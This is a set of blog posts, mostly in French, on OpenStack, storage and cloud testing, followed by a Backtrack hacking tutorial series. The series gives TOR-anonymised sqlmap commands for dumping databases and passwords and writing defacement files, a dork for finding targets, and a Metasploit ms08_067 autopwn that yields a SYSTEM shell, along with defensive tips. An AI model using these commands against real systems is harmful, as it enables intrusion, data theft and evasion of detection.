But today, I’m proud to release my first documentation on OpenStack.

I’ve been working for three weeks with StackOps for my internship, and my work is about Quantum (Networking as a service in OpenStack).

It was quite difficult to have a working infrastructure because Quantum is only in « incubation » for Essex release. That’s why I release a documentation in which anyone can test this fabulous software.

You can find this documentation with all configuration files & scripts here.

Or read it directly here :

Download (PDF, 320.87KB)

Share & Enjoy !

N.B. : Thank’s to StackOps team for the welcome in Madrid.

Please let me know if you can find some mistakes, and of course I will correct it.

Toujours dans mon projet de formation sur OpenStack, j’ai décidé de me concentrer sur la partie stockage d’une infrastructure.
 
 
 
Je recherchais une solution qui répondait à ces critères :

• Environnement Open-Source
• Respect des standards
• Compatibilité avec les IaaS du marché (on verra plus tard que j’ai testé VMware & OpenStack)
• Bien documenté, et si possible un forum bien actif

J’ai donc choisis de tester NexentaStore Enterprise Edition dans sa version d’essai.

Ce que j’ai eu en plus avec Nexenta :

• Une interface d’administration & de configuration user-friendly (Web-GUI)
• Une liste très impressionnante de plugins (gratuits & payants) qui apportent des fonctionnalités non-négligeables
• La chance de pouvoir tester NexentaStor Enterprise Edition gratuitement pendant 45 jours.
• L’immense chance de pouvoir tester le plugin « HA Cluster » (que nous verrons plus tard) pendant 45 jours également (merci à l’équipe de Nexenta de m’avoir aidé).

Qu’est-ce que l’Open-Storage ?

Pour résumer l’Open-Storage avec des mots simples :
Fournir du stockage de manière standard, provenant de différentes sources, propriétaires ou libres. C’est donc s’affranchir du matériel propriétaire et hétérogène, pour rationaliser ses ressources en stockage.
L’Open-Storage est donc une solution économique de se créer une baie de disque hautement disponible et tolérante aux pannes, à partir de différentes sources de stockage.
En résumé, voici 3 avantages liés à l’Open-Storage :

• Votre stockage devient ouvert et accessible, grâce aux standards de l’industrie du stockage.
• Vous dessinez vous-même votre architecture de stockage. Il n’y a donc aucune limite à votre infrastructure !
• Votre Hardware devient flexible, dans la mesure où tout changement devient transparent pour l’utilisateur final.

Cas concret :

Je dispose actuellement d’une baie de stockage EMC, avec des disques plutôt performants en lecture / écriture. A coté de ça, j’ai récupéré une baie de disques SSD (très rapides donc), et enfin une baie assez ancienne comprenant des vieux disques toujours opérationnels.

Dans mon réseau, je souhaite fournir du stockage :

• assez performant pour mes serveurs ESXi pour le stockage des machines virtuelles.
• plutôt rapide pour mon infrastructure VDI, fournie par VMware View
• lent, mais facilement extensible pour du Cloud storage (exemple : Dropbox, Ubuntu One, SkyDrive, etc).

Ce que fait NexentaStore :

Pour commencer les présentations, il est bon de rappeler les bases.

NexentaStor est une appliance, basée sur OpenSolaris. Étant payante, j’ai donc usé de la licence Trial qui m’a permis de tester le produit dans sa totalité pendant 45 jours.

Il existe une version gratuite, NexentaStor Community Edition qui permet de fournir jusqu’à 18To de stockage (Raw). Attention, je n’évoquerai pas ce produit dans cet article car il ne supporte pas l’ajout des plugins type « HA Cluster » & autre.

Pour voir la liste complète des fonctionnalités, vous pouvez directement le lire sur le site officiel. Cependant, voici les points intéressants de ce produit :

• Système de fichiers ZFS 128 bits
• Aucune limite de stockage (ni eu capacité de stockage, ni en taille de fichier)
• Compatible SAN (iSCSI & FC) & NAS (NFS, CIFS, WebDAV et FTP)
• Optimisation du stockage (compression, dé-duplication)
• Création de Pools de stockage (pour améliorer les performances)
• Snapshots à chaud
• Réplication synchrone et asynchrone (pour faciliter le Disaster Recovery)
• Intégrité des données
• De nombreux plugins très puissants (je reviendrai plus tard vers le plugin HA Cluster)
• Et enfin, ce que j’ai vraiment apprécié : intégration avec VMware, Xen, OpenStack et Hyper-V.

Avec NexentaStor, je vais être capable de rationaliser le stockage que j’ai à ma disposition, de le rendre hautement disponible et tolérant aux pannes, et enfin de le distribuer vers des hôtes à travers des protocoles standards et connus de tous.

Mon infrastructure

Des fois, un bon vieux dessin vaut mieux qu’un gros pavé. Donc j’ai pris Visio pour vous montrer mon architecture :

• Je dispose d’une baie EMC avec des disques dur SAS en RAID 5, ainsi qu’une autre baie avec des disques SSD.
• Mes 2 appliances sont virtualisées dans mon infrastructure VMware, et sont en cluster avec le plugin HA.
• Je fournis du stockage pour les clients légers (VDI), mes VMs & volumes (pour OpenStack), et pour du Cloud Storage.

Ce que j’ai testé :

Dans un premier temps, j’ai testé :

• les fonctionnalités de base : Mapping de volumes over iSCSI, partage de fichier CIFS (dans un domaine 2008 R2 Natif), et NFS.
• Ensuite, j’ai fait la demande au service commercial de Nexenta pour tester gratuitement le plugin HA Cluster (qui coûte 4900 $). Il m’a permis de rendre hautement disponible le stockage que je met à disposition sur on réseau.

Je vais m’attarder sur ce plugin car je l’ai trouvé particulièrement puissant :

• L’installation se fait assez aisément, mais il faut au préalable avoir lu la documentation officielle (comme d’hab, RTFM !!!), sinon vous aurez des erreurs.
• J’ai été agréablement surpris. Tout a fonctionné du 1er coup : l’installation du plugin, la configuration de la mise en cluster des 2 appliances, la création des volumes à partager, et la configuration dans VMware ESX (la configuration du Multipath se fait toute seule).
• J’ai testé le basculement vers le serveur secondaire en mode Failover automatique et l’interruption de service était de 8 secondes (le temps pour l’IP Failover de switcher vers l’autre serveur). J’ai vraiment aimé le principe de pouvoir utiliser les cartes réseaux en Failover et continuer à fournir le stockage depuis le serveur principal. Si c’est le serveur en entier qui n’est pas accessible, l’autre prendra le relais et le service ne sera pas stoppé.

Voici une capture d’écran du dashboard du plugin HA Cluster (Cliquez-sur l’image pour agrandir) :

Par rapport à ce plugin, je dirais qu’il va à l’essentiel : il fonctionne et permet réellement de faire de la HA au niveau storage.

• Autre plugin très intéressant : VMDC (Virtual Machines Datastore Center). Il permet de gérer les datastores d’un hyperviseur directement depuis l’IHM de NexentaStor. Il est compatible avec VMware, Xen et Hyper-V. Suivant l’API de l’hyperviseur, certaines fonctionnalités sont disponibles en plus, comme l’arrêt ou le redémarrage des VMs.

• Je garde le meilleur pour la fin… le plugin OpenStack, qui permet d’intégrer du stockage fournis par NexentaStor dans une infrastructure OpenStack, et plus particulièrement pour le service nova-volumes (qui fournit des block devices aux VMs). De base, le driver est capable de créer des volumes, de les supprimer, et de réaliser des snapshots, et tout ça grâce aux REST API. Je rajouterai encore quelque chose de très pertinent : la distribution StackOps intègre nativement le driver NexentaVolumeDriver, et permet dès le SmartInstaller d’indiquer où se trouve le serveur NexentaStor.

Ce que j’en pense :

Vous l’aurez compris… que du bien !

Non, plus sérieusement. NexentaStor est un produit de qualité, et je pense qu’en s’ouvrant aux différentes technologies, il s’offre un bel avenir devant lui, et continuera de séduire tous ceux qui ne peuvent pas s’offrir des baies de stockages propriétaires. Ce que j’ai vraiment aimé, c’est la compatibilité avec les différents protocoles de transport de fichiers (NFS, CIFS, FTP, WebDAV) et également les technologies SAN (iSCSI & FC). De plus, ses plugins font de NexentaStor une solution flexible, et ouverte à un environnement hétérogène. Peu importe votre matériel et vos outils déjà en place : il sait s’adapter, et offrir ce qu’il sait faire de mieux : du stockage hautement disponible.

Les alternatives :

Il existe plusieurs alternatives, mais j’en ai testé une Open-Source, et une propriétaire.

Il s’agit de FreeNAS, et de Datacore SAN-Symphony-V.

• Concernant FreeNAS, ses fonctionnalités ne sont pas aussi poussées que les produits de Nexenta.
• Pour SAN-Symphony-V de Datacore, j’ai eu la chance d’avoir un cours sur le produit, ainsi qu’un TP à l’université. Je dois dire que le software est impressionnant, et qu’il fournit du stockage de manière performante et hautement disponible grâce à la mise en cluster. Il ne manquerait plus qu’une interopérabilité avec d’autres acteurs du  Cloud comme le fait Nexenta avec ses plugins vus précédemment, ainsi qu’une REST-API (le seul moyen d’administrer le stockage sous SSV étant le Powershell ou la GUI en dotnet depuis Windows). J’ai eu l’occasion de créer du stockage à partir de SAN-Symphony pour OpenStack nova-volumes, mais je n’ai pas fait de benchmark pour le comparer avec le produit Nexenta.

Si des gurus du Cloud lisent cet article, n’hésitez pas à laisser votre commentaire !
 
Je vous laisse, je retourne dans mes nuages

Pour rappel, HP se lance dans le Cloud public avec l’arrivée d’HP Cloud Services qui propose tout comme ses concurrents (RackSpace, IBM, …) un cloud de type IaaS (Infrastructure As A Service).

Je me suis donc précipité sur l’invitation, et j’ai créé mon compte afin de tester tout ça.

Pour tout vous avouer, ce qui m’a le plus motivé à tester le produit, c’est évidemment le fait qu’il soit basé sur OpenStack.

Je vous rapporte donc ce que j’ai testé, et les différentes fonctionnalités que j’ai appréciées ou celle que je n’ai pas vues.

Résultats du test :

- Compute :

• 2 clusters localisés à l’ouest des USA (pour l’instant).
• Pour ma part, aucun problème de latence.
• 6 tailles de serveurs (j’ai testé la standard.xsmall ainsi que la standard.large)
• Plusieurs images disponibles, toutes basées sur Linux (Ubuntu, CentOS)
• 1 IP publique par VM ! Pour le coup, j’ai vraiment été surpris.
• la gestion des VMs peut se faire via API (avec euca2ools) sinon depuis le dashboard d’HP qui est plutôt bien fait.
• On accède aux VMs par SSH (avec la clé privée qu’il faut télécharger), et le terminal est bien renseigné (facturation, ressources consommées, charge en temps réel…)
• Voici mes critiques : impossibilité de faire des snapshots des VMs (pour l’instant j’imagine), pas moyen pour le moment de créer des volumes, et de les attacher aux VMs (avec la fonction de snapshot si possible).
• Ensuite, j’aurais bien apprécier de pouvoir migrer les VMs entre cluster, mais je n’ai pas eu de réponse d’HP concernant cette fonctionnalité… A voir donc si ce sera possible dans l’avenir.

- Cloud storage :

• L’interface Web intègre une gestion de son Cloud Storage.
• Les fonctionnalités sont rudimentaires : Envoyer / Télécharger des fichiers depuis cet espace.
• J’imagine que derrière tout ça se cache le module Swift (OpenStack Storage) donc rien à dire de ce coté, si ce n’est qu’on ne connaît pas encore la limite de stockage pour l’offre de base, et il n’y a pas encore de fonction de partage de fichier. Bref, c’est une Beta !!
• Cela-dit, je suis plutôt content qu’une interface web soit enfin développée pour gérer du cloud storage avec Swift. Remarquez sur la capture d’écran que l’interface est plutôt simple mais assez complète pour l’instant.

Bien sûr, ces remarques n’engagent que moi-même, et je suis ouvert à toute discussion.

Dans tous les cas, je suis très heureux de voir OpenStack continu d’être adopté par les plus grands de ce monde… Pourvu que ça dure !!!

Cela fait plusieurs semaines que je travaille sur un projet de Cloud Open-Source, de type IaaS (Infrastructure As A Service). Je dois dire que c’est un projet très intéressant et surtout prometteur dans un monde où VMware a tendance à écraser le marché. Je trouve génial de pouvoir disposer d’outils libres et gratuits pour comprendre la virtualisation.

Dans cet article, je vais vous présenter mon projet, et je vous publie aussi le résultat de mon travail (un Powerpoint d’une cinquantaine de slides qui résume mon étude).

Mise en situation

Concrètement, il m’a été demandé par mon directeur de formation d’installer un service de Cloud Computing Open-Source (avec OpenStack) qui fournirait un catalogue d’images (Ubuntu Server, Windows 2008 R2, etc) et managable depuis un navigateur Web. Plus concrètement, voici un descriptif du processus :

• Le client se connecte via un navigateur Web sur un Dashboard
• En fonction de son profil, il a le droit ou non de créer des machines virtuelles, de créer des images, des snapshots, de gérer son réseau, etc.
• Le client crée une machine virtuelle (exemple : Ubuntu Server) à partir d’un template, et lui attribue une adresse IP publique.
• Il peut accéder à sa VM via SSH et a un accès root au système.
• La machine peut être rebootée, et éteinte.
• Le client peut consulter ce qu’il a consommé et voir combien il paiera en fin de mois pour son usage.

Plusieurs points sont intéressants, c’est tout d’abord le dashboard. Accessible depuis Internet, le client s’authentifie de manière sécurisée et effectue toutes ses tâches nécessaires. Secundo, le principe de facturation est super intéressant pour une entreprise qui facture à son client en fonction de son utilisation. Enfin, outre le fait que tout les outils sont libres et gratuits, ils sont très compatibles avec les API des autres systèmes (ex : Xen, VMware, etc).

Mon étude

Je ne vais pas rentrer dans les détails ici, mais plutôt vous donner le lien de téléchargement de mon fichier PDF que j’ai réalisé pour ma présentation.

Voici un aperçu avec Google Doc (il manque des visuels) :

Download (PDF, 1.09MB)

Dans quelques semaines, je recommence à travailler sur ce projet, et je vais me concentrer sur le nouveau Dashboard (Diablo) qui permet de faire plus de trucs que le module Cloud de Drupal. J’aimerais aussi me pencher sur la compatibilité avec les autres hyperviseurs, notamment les proprio (ça m’intrigue !). Enfin, je compte me perfectionner sur la haute disponibilité pour prétendre avoir un Cloud Open-Source performant, disponible, et compatible !

La suite bientôt…
PS : Le document fourni est 100% libre de droit, mais en cas de réutilisation, merci de me prévenir . Je suis également adepte au remarques et critiques, donc n’hésitez pas !

Je ne peux pas parler de ce sujet sans aborder les injections SQL. Toutefois, la lecture de ces quelques lignes requiert certaines connaissances en base de données SQL. Je ne ferai aucun rappel sur ce langage.

Voici le plan de cet article :

• Définition
• Exploitation
• Impact
• Se protéger

Bien entendu, cet article a pour vocation d’expliquer comment les hackers font, et comment se protéger des attaques de ce type.

• Définition

Une injection SQL est une méthode d’exploitation d’une faille de sécurité liée à une base de données. Elle consiste via une application utilisant une base de données SQL à injecter une requête qui permettrait d’obtenir beaucoup d’informations allant de la version du serveur jusqu’à la base de données complète. Nous allons voir dans la partie « Impact » ce qui est exploitable également.

Techniquement, une injection SQL via un site web consiste à exploiter une variable non protégée appelée via une URL.

Voici un bref exemple : « http://www.target.com/photos.php?id=1 »

Cette URL affiche par défaut la page d’identifiant 1 par rapport à la base de données.
En fin de compte, cette URL pourrait ressembler à cette requête SQL :

SELECT *
FROM photos
WHERE 'id_photos = 1' ;

Cette requête pourtant simple permet toutefois beaucoup de choses si le code PHP a été mal programmé. Nous y reviendrons plus tard.

• Exploitation

La meilleure explication est l’exemple.

Le hacker va tout d’abord chercher sa victime en fouillant le site Internet cible. Il pourra notamment s’aider de Google.

Par exemple, il va rechercher sur Google tous les « gallery.php » utilisant des ID :
inurl:gallery.php?id=

Dans la plupart des cas, les sites Web sont faits à l’aide de CMS, ou alors codés entièrement à la main. Mais il arrive que ces CMS ne soit pas à jour, ou alors que le développeur web n’est pas pris soin de protéger les variables utilisées par les URL.

Lorsque le hacker va tomber sur une page de ce style, il va remplacer le 1 par un -53 par exemple, de manière à provoquer une erreur.

Si le message suivant apparaît, vous pouvez être sûrs qu’une injection SQL est possible :

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/users/site/html/gallery.php on line 248

En fait, j’irai même plus loin en disant que si http://www.target.com/photos.php?id=1 affiche la même chose que http://www.target.com/photos.php?id=1+AND+1=1 ou/et que http://www.target.com/photos.php?id=1+AND+1=2 diffère de la 1ère page, il y a vulnérabilité.

Avec la distribution Backtrack, voyons maintenant ce que l’on peut faire. L’excellent outil « SQLmap » nous permettra de réaliser tous les tests nécessaire pour une injection SQL.

Je vais vous montrer quelques commandes (je n’invente rien, j’ai juste lu la doc ).

Note : Dans toutes mes commandes, j’utilise TOR pour rester anonyme, ainsi qu’un générateur d’USER-AGENT pour que le serveur web distant ne détecte pas de requêtes HTTP provenant d’un certain « SQLmap ».

Pour exécuter ces commandes, il faut avant se rendre dans le répertoire /pentest/database/sqlmap. Il faut également remplacer quand c’est le cas dans mes commandes $url par l’URL du site, $db par le nom de la base de données, $table par le nom de la table, $column par le nom de la colonne et $sql par la requête SQL voulue.

Auditer si l’URL est vulnérable :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent

Si le site est vulnérable, il vous le dira explicitement.

C’est le cas pour notre exemple, passons à la suite.

Lister les privilèges SQL avec l’injection SQL :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –privileges

Lister les bases de données :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –dbs

Indiquer le nom de la base de données où l’injection SQL se fait :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –current-db

Montrer les mots de passe d’accès à la base de données :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –passwords

Lister les tables sur 5 threads (plus rapide) :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –tables -D $db –threads= »5″

Lister les colonnes :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –columns -D $bdd -T $tables

Dumper le contenu d’une table :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –dump -D $db -T $table –threads= »5″

Exécuter une requête SQL :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –sql-query= »$sql » -D $db

Si vraiment le serveur est mal configuré, il est aussi possible d’écrire un fichier (utilisé lors de defacements) :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –file-write=$file –file-dest /var/www/public_html/

SQLmap s’utilise aussi avec Metasploit :

$ msfconsole
 
                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##
 
msf > use auxiliary/scanner/http/sqlmap
msf auxiliary(sqlmap) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(sqlmap) > run

Vous l’aurez compris, cet outil est hyper puissant, d’ailleurs j’insiste sur le fait que pour obtenir de meilleurs résultats, il est important de le mettre à jour régulièrement avec l’option –update.

• Impact

Quel impact d’une telle attaque ?
La liste peut être longue, mais je vais faire court :

- compromission d’une partie ou d’une entière base de données, qui peut contenir des informations précieuses : logins, mots de passe, e-mails, coordonnées bancaires, etc.
- compromission d’autres bases de données quand un seul utilisateur existe pour 150 bases de données (sisi je vous jure, ça existe).
- compromission des données du serveur Web (on a vu qu’on pouvait dans certains cas écrire sur le serveur).

• Se protéger

Il existe à chaque niveau des moyens pour se protéger contre les injections SQL.

Je vais partir des couches basses pour remonter peu à peu :

- Installer un équipement de détection d’intrusion de type IDS et mettre régulièrement à jour la base de données qui contient les « exploits » connus.
- Installer un SGBDR connu, et le mettre à jour très régulièrement. Par exemple, MySQL est très performant, mais nécessite toutefois d’être mis-à-jour souvent.
- Utiliser au mieux toutes les fonctionnalités des bases de données : pour chaque site par exemple, créer sa base de données, son utilisateur SQL, avec un minimum de droits. Bien entendu, le concept d’un seul utilisateur avec tous les droits partout est à proscrire !!!
- Utiliser un serveur Web reconnu et le mettre à jour souvent. Apache est très bien reconnu dans le domaine.
- Enfin, il est plus qu’obligatoire de protéger toutes les variables utilisées.

Exemple : $id = mysql_real_escape_string($_POST['id']);

Dans ce domaine, voici un lien très intéressant. Si vous n’y connaissez rien, utiliser un CMS bien reconnu, et mettez-le à jour dès que possible ! (WordPress par exemple)

En résumé : utiliser des outils connus et les mettre à jour régulièrement.

En conclusion, SQL est un langage surpuissant, qui demande beaucoup de connaissances. Négliger la sécurité dans les couches hautes, peut compromettre tout le reste. Imaginer le pire : intrusion sur un serveur web via injection SQL, accès à d’autres serveurs via une connexion de pont, dump de toutes les bases de données, defacement de sites web…

Aujourd’hui, les injections SQL sont les vulnérabilités les plus utilisées sur le Web.
A bon entendeur…

L’exploitation de faille est un moment excitant. Toutes les recherches engagées vont normalement porter ses fruits. Nous allons enfin explorer les faiblesses d’un réseau ou d’un système.
Suivant les vulnérabilités, il y a des tonnes de possibilités en matière d’exploitation. Si vous voulez en savoir plus, faites comme moi et achetez un bon bouquin relatant des techniques de Hacking. Vous comprendrez mieux quelles sont les différentes méthodes pour exploiter une faille, ainsi que les différents types de failles.

Comme il existe beaucoup de types de failles, et énormément de méthodes, je m’arrêterai sur un cas général, en appliquant une technique « classique ».

Après avoir collecté un tas d’informations sur le réseau, ainsi que sur la machine ciblée, nous avons évaluer ses vulnérabilités. Rappelez-vous de notre bon ami Nessus qui nous a clairement indiqué que la machine cible avait comme système d’exploitation Windows XP SP3, et proposait le service de système de fichiers réseau CIFS. Seulement voilà, cette machine est vulnérable. Non pas parce qu’elle utilise ce service, mais parce que l’administrateur de la machine n’a pas pris le temps de mettre à jour régulièrement son système d’exploitation via Windows Update, ainsi que l’antivirus

Sachez que les tests réalisés en réseau local ont été effectué avec l’antivirus Avira Antivir (ainsi qu’une base de données antivirale de moins d’un an), sur un Windows XP SP3 sans mises à jour récentes.

Vous serez surpris de voir qu’il existe énormément d’ordinateurs au monde dans ce cas là. Ils sont souvent la proie des virus sur Internet (qui aident notamment à réaliser des attaques DDoS (Distributed Denial of Service).

Dans notre étude de cas, nous allons utiliser Metasploit Framework (MSF).

Sa base de données contient tous les exploits / payloads connus à ce jour. Bien entendu, pour une bonne utilisation de cet outil, il est important de le mettre à jour régulièrement (voir même avant chaque utilisation) avec la commande « msfupdate« .

Dans un terminal, démarrez l’outil « msfconsole« .

root@root:~# msfconsole
 
_
| |      o
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
|  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
 
=[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
 
msf >

Nous allons utiliser le résultat du scan Nessus exécuté dans dans la recherche de vulnérabilité (dernier article), et l’importer dans une base de données SQL :

msf > db_import /root/nessus_report_Win.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.128.129
[*] Successfully imported /root/nessus_report_Win.nessus
msf > db_import /root/nessus_report_Win.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.128.132
[*] Successfully imported /root/nessus_report_Win.nessus

MSF connaît maintenant votre victime : comment la joindre, et surtout quelles sont les vulnérabilités trouvées par Nessus.

Nous allons lancer une commande qui va automatiquement exploiter l’un des failles disponibles afin d’obtenir une session avec la machine distante. Admirez le travail :

msf > db_autopwn -x -e
[*] (1/3 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.128.132:445...
[*] (2/3 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.128.132:445...
[*] (3/3 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.128.132:445...
[*] (3/3 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.128.138:48400 -> 192.168.128.132:6313) at 2011-09-05 09:40:24 -0400
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...

0wned ! Le tour est joué, la machine distante est prise au piège. Nous avons utiliser l’exploit ms08_067_netapi pour pénétrer le système.
Pour retrouver une session ouverte, il suffit d’exécuter cette commande :

msf > sessions -l
 
Active sessions
===============
 
  Id  Type                   Information                           Connection
  --  ----                   -----------                           ----------
  1   meterpreter x86/win32  AUTORITE NT\SYSTEM @ VICTIME-484AF1D  192.168.128.138:48400 -> 192.168.128.132:6313

Et maintenant ?

Maintenant passons aux vilaines choses.
Pour obtenir le shell d’une session ouverte, il suffit de l’appeler par son ID :

session -i 1

Ensuite, la commande « help » vous éclairera sur la suite. Vous pouvez par exemple explorer les fichiers, prendre une capture d’écran, enregistrer les touches du clavier utilisées et encore plein d’autres trucs, dont des tâches administratives.

Cependant, un hacker ayant obtenu le shell d’un système essaye dans la plupart des cas de rester discret.
Dans le prochain article, nous allons voir comment installer un « backdoor » afin de pouvoir revenir plus tard sur le système sans exploiter de faille.
Ah oui, j’oubliais. Backtrack fournit une excellente interface graphique à MSF : « Armitage« .

Par rapport aux autres articles, aucune nouveauté en matière de lutte contre ce genre d’attaque. Un antivirus à jour, un pare-feu bien configuré, un système d’exploitation récent et à jour suffiront à éviter ce genre d’exploitation.

Aujourd’hui, les systèmes les plus vulnérables sont les sites Web qui sont très souvent victimes d’injections SQL permettant de récupérer des fichiers importants, et de compromettre la sécurité du serveur, et donc du réseau tout entier.

Nous continuons la série d’articles consacrés à Backtrack.

Rappelons en quelques mots les objectifs de ces quelques articles. Après avoir testé la distribution pendant quelques semaines, j’ai jugé sympa de partager quelques ressources. Chaque première partie d’un article permet de comprendre comment les pirates informatiques font pour pénétrer un système et pour obtenir des informations précieuses. La deuxième partie quant à elle explique comment éviter ce genre d’attaque, et donnes quelques indications sur la manière de protéger un réseau et un système.

Nous avons vu ensemble comment se déroulait la 1ère étape : la collecte d’informations.

Clairement, cette partie nous a fait comprendre comment identifier la cible :

• Son matériel (si possible)
• Son système d’exploitation (et si possible sa version)
• Ses services (si possible avec leur version)
• Pour les applications Web : leur langage de programmation
• Pour les bases de données : leur système de gestion de base de données

Ces informations recueillies ne sont pas perdues, bien au contraire. Nous allons maintenant les passer en revue pour détecter la moindre faille qui pourrait être exploitable par la suite.

Les moyens engagés pour détecter les vulnérabilités

• Scanner de vulnérabilité

- Nessus : Nous l’avions dit dans l’introduction consacrée à la distribution Backtrack, il est  incontournable dans le monde de la sécurité.

Avant toute chose, il est nécessaire d’obtenir une clé de licence (gratuite). Une fois reçue dans votre boite mail, exécutez la commande suivante :

sudo /opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx
sudo /opt/nessus/bin/nessus-fetch --security-center

Il faut maintenant créer un utilisateur interne au logiciel avec lequel vous vous loguerez pour faire des audits :

sudo /opt/nessus/sbin/nessus-adduser

Une fois configuré, mettez les plugins à jour avec la commande

nessus-update-plugins

Nous pouvons maintenant accéder au logiciel depuis un navigateur web à l’URL : http://localhost:8834

Renseignez le login / mot de passe configuré deux étapes plus haut. Vous avez un menu supérieur qui vous permet de gérer les utilisateurs, les politiques d’audit, les audits, et les rapports d’audit.

Dans un scénario classique, nous pouvons démarrer un audit directement en utilisant une politique par défaut. Dans mon scénario, nous avions détecté que la victime était un ordinateur disposant du système d’exploitation Windows XP SP3, ainsi que le partage de fichier activé. Créer un nouveau « Scan« , puis choisissez une des politiques par défaut (pour mon test, je choisis « Internal Network Scan« ). Je n’oublie pas de préciser l’adresse IP de la cible dans « Scan Targets« . Je clique sur « Launch scan« , et j’attends. Pour suivre en temps réel l’audit, rendez-vous dans le menu « Reports« . Cliquez deux fois sur le scan en cours, et découvrez les informations récoltées, avec leurs précisions.

Une fois le test terminé, les failles sont classées par importance. Sachez que si vous trouvez des failles dans la colonne « High« , il est certain que votre système est hautement vulnérable et facilement accessible depuis l’extérieur.

Dans notre étude de cas, nous avons découvert les vulnérabilités concernant le serveur SMB. Dans le prochain article, nous tenterons d’exploiter ces failles afin d’obtenir un shell sur l’ordinateur cible. En attendant, n’oubliez pas que ces informations sont précieuses et qu’il faut absolument les sauvegarder. Cliquez sur « Download Report » en bas à gauche. Choisissez le format par défaut et placer votre fichier en lieu sûr (dans Dradis par exemple).

Nous l’avons vu, Nessus est rapide et efficace. Il est important de mettre à jour régulièrement les plugins pour trouver les failles les plus récentes. Il est capable de nous donner énormément d’informations concernant la configuration d’un service distant. Nous le verrons un peu plus loin, c’est l’outil indispensable pour auditer soi-même nos propres systèmes.

- Mantra : Navigateur Web basé sur Firefox contenant un large panel de plugins utiles pour l’audit d’applications Web. En quelques clics, explorer les failles XSS, ou tentez des iSQL directement sur des pages Web. Les XSS sont relativement fréquentes sur Internet, surtout dans les formulaires où les développeurs Web ne prennent pas toujours le temps de sécuriser leur production.

• Évaluation du réseau

Nous avons vu deux outils généralistes pour scanner un réseau ou une application web. Voyons maintenant quelques outils plus spécialisés.

- Cisco Tools : Contient des scripts pour auditer des équipement actifs de marque Cisco. Certains outils sont capables de détecter la version de l’IOS d’un équipement distant, et donc de connaître ses vulnérabilités.

- Network Fuzzing : Injecte des données aléatoire sur un réseau. « Bed » est un outil puissant qui permet de détecter si un service peut être victime de Buffer Overflow (dépassement de mémoire tampon). Le logiciel « sfuzzer » est également un outil qui permet de tester un  logiciel.

- Rapports de vulnérabilité en ligne : Consultez OSVDB et CVE pour connaître les dernières failles en date.

- VOIP Fuzzing : Détecter les failles d’un réseaux VOIP avec la technique de fuzzing avec le logiciel « voiper » par exemple.

• Évaluation d’applications Web

Les réseaux ne sont pas les seuls vulnérables. Plus haut dans les couches du modèle OSI, les applications Web peuvent être une véritable porte d’entrée vers un système ou vers des informations compromettantes.

- Outils dédiés aux CMS : « Joomscan » est tout simplement l’outil de référence qui permet de détecter des failles dans un site web fait avec le CMS Joomla. L’outil est assez puissant, mais la mise à jour du logiciel ne fonctionne pas (la base de données des failles étant de 2009). « Plecost » est quant à lui dédié au CMS WordPress. Pensez à récupérer la dernière version du fichier texte qui contient les numéros de version des plugins WordPress.

- Webshag est un webfuzzer très simple d’utilisation, car il est disponible en interface graphique. L’outil Webslayer est également très puissant. Ces deux logiciels retenus permettent d’interroger violemment une page web afin d’en ressortir un maximum d’informations (nom des variables, e-mails, méthodes des formulaires, etc.)

- MetaGooFil est un script très pratique pour rechercher rapidement tous les fichiers disponibles triés par extensions  (exemple tous les PDF) sur un site web. Il n’est pas rare de trouver des fichiers texte contenant directement des adresses e-mail ou des mot de passe en clair. Le principal atout de ce logiciel est bien entendu l’extraction de méta-données. En effets, elle peuvent contenir les noms et prénoms des auteurs des fichiers, leurs logiciels et leurs versions, etc. Une mine d’or pour recueillir des informations sur la victime.

- W3af est l’outil Open-Source de référence pour auditer un site Web. Plusieurs plugins sont disponibles : bruteforce, audit, etc. Le résultat du scan nous indique les vulnérabilités présentes sur le site en question. J’ai trouvé ce site qui est un Wiki de W3af (et qui regorge d’informations essentielles).

• Évaluation de bases de données

Les outils d’évaluation de vulnérabilités de base de données sont les mêmes que ceux pour la collecte d’information :

- SQLmap et SQLninja : outils d’injection SQL

- SQLbrute : outil d’injection SQL en bruteforce.

Nous étudierons plus en détail ces outils dans l’exploitation de failles (prochain article).

Les moyens pour lutter contre la détection de vulnérabilités.

Je pense que ce sont les mêmes que pour la collecte d’information.

En effet, la détection de vulnérabilités est également une action de recherche d’informations, mais plus orientée dans la découverte des versions utilisées, ou dans les méthodes appliquées de développement.

